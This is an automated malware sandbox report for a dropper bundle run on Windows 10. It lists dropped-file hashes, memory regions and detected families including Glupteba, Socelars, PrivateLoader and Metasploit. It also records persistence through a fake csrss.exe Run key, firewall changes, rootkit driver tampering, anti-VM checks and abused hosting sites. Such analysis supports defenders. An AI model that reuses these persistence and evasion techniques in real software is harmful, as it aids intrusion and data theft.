memory/408-212-0x0000000000C80000-0x0000000000D1A000-memory.dmp

memory/2984-228-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-226-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-225-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-224-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2984-222-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-220-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-218-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2984-216-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-240-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-239-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-238-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-237-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1988-235-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-233-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1988-231-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1000-257-0x0000000000400000-0x0000000000CBD000-memory.dmp

memory/2920-256-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1140-255-0x0000000000400000-0x000000000071A000-memory.dmp

memory/1824-254-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/2448-259-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2380-258-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2200-260-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/408-261-0x0000000002500000-0x00000000027DD000-memory.dmp

C:\Program Files (x86)\Gparted\Build.exe

MD5 c874508845d1c0bb486f5e41af8de480
SHA1 3ac7e246934ba74c1018d50138bea77b035d6f90
SHA256 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
SHA512 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

memory/2604-316-0x0000000000250000-0x0000000000272000-memory.dmp

memory/2604-317-0x0000000000660000-0x0000000000668000-memory.dmp

memory/2908-334-0x0000000000520000-0x0000000000B08000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2908-343-0x00000000006F0000-0x0000000000CD8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab4C6B.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LWO3RY20FVQAOPBHSTHK.temp

MD5 2d33c01f49f1bdd60fe7aff24ae5772b
SHA1 83c3fac2f868c972b357a4be69fc384d207da6d7
SHA256 2be80eb8dc21b752dc538a3ec89099ce4b423f7b598f5023a27e00e14cf4b037
SHA512 09175799d4917b767785ecaa001a1ba232f00db26aff1923463e7bbf4898aa5ab192fc77b00b7634489a9615cc2dc5e95e3989769f4c471730fb846f33111f01

C:\Program Files (x86)\Gparted\gimagex.exe

MD5 85199ea4a530756b743ad4491ea84a44
SHA1 0842cd749986d65d400a9605d17d2ed7a59c13cc
SHA256 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
SHA512 b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

memory/2908-369-0x0000000000520000-0x0000000000B08000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar7051.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 05:21

Reported

2024-11-07 05:23

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Gparted\Build.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10d7483856.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a80f141fb08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QUT4G.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AncientDawn = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-D2JOK.tmp C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-LLGF4.tmp C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_240637312 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-N8LR0.tmp C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-QUT4G.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\rss\csrss.exe N/A
